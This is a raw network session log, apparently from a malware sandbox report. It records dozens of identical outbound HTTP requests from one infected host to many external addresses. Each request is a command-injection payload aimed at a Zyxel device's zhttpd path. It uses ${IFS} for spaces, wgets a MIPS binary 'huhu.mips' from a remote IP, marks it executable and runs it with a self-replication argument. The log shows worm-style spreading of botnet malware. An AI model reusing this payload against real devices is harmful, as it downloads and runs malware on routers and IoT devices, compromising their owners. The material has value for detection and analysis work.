                                                Jan 29, 2024 07:08:04.674132109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8317192.168.2.235005867.84.177.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674160004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8318192.168.2.2335004139.49.208.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674202919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8319192.168.2.2354996175.218.94.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674232006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8320192.168.2.235146663.7.217.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674268961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8321192.168.2.2350080149.180.188.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674335957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8322192.168.2.234558277.58.155.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674380064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8323192.168.2.234157699.95.234.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674423933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8324192.168.2.235566860.181.69.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674474955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8325192.168.2.2359680150.226.205.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674526930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8326192.168.2.235370260.227.2.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674572945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8327192.168.2.2337952117.85.140.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674623966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8328192.168.2.2350434168.49.38.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674652100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8329192.168.2.2351636120.205.30.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674705029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8330192.168.2.233434238.48.120.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674729109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8331192.168.2.234600231.222.31.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674777031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8332192.168.2.236020297.233.163.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674793959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8333192.168.2.234262671.200.214.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674829960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8334192.168.2.236021098.28.97.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674853086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8335192.168.2.2338564123.197.204.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674901009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8336192.168.2.2334634197.77.78.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674937010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8337192.168.2.235718865.175.31.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674957037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8338192.168.2.2342030159.72.110.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.674997091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8339192.168.2.2338092202.163.87.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675049067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8340192.168.2.2351500184.49.22.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675096035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8341192.168.2.235307470.147.233.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675143003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8342192.168.2.2348080170.11.179.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675167084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8343192.168.2.2347602130.96.150.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675204039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8344192.168.2.234643047.136.137.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675259113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8345192.168.2.233319247.119.234.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675302029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8346192.168.2.234944431.34.252.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675347090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8347192.168.2.235757094.252.193.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675379992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8348192.168.2.2352484176.246.29.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675430059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8349192.168.2.234597654.0.65.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675514936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8350192.168.2.235322459.156.247.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675553083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8351192.168.2.2334754174.144.48.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675574064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8352192.168.2.234278634.136.241.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675657034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8353192.168.2.235816095.59.228.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675681114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8354192.168.2.235557665.95.76.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675718069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8355192.168.2.2344474157.158.193.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675760031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8356192.168.2.2350320179.66.172.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675810099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8357192.168.2.2353372141.72.16.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675827026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8358192.168.2.23462548.6.139.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675865889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8359192.168.2.235482858.223.223.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675877094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8360192.168.2.235806646.30.111.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675940037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8361192.168.2.2350810178.145.88.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675964117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8362192.168.2.2342638169.47.74.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.675992012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8363192.168.2.235599485.85.63.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676043034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8364192.168.2.236023092.152.138.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676079035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8365192.168.2.2349496186.197.185.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676115036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8366192.168.2.2336222103.244.98.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676155090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8367192.168.2.2342100136.220.146.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676187992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8368192.168.2.2344316193.145.228.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676244974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8369192.168.2.2352340220.98.2.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676275969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8370192.168.2.2344552104.232.18.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676316977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8371192.168.2.233878482.47.104.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676361084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8372192.168.2.233827479.35.63.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676424026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8373192.168.2.2359478115.107.62.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676466942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8374192.168.2.235009846.138.68.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676505089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8375192.168.2.233947092.151.179.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676529884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8376192.168.2.235605039.240.82.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676621914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8377192.168.2.2360520139.247.103.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676645041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8378192.168.2.235450834.168.77.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676683903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8379192.168.2.2334150187.239.99.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676723957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8380192.168.2.233352248.63.99.207443
                                                TimestampBytes transferredDirectionData
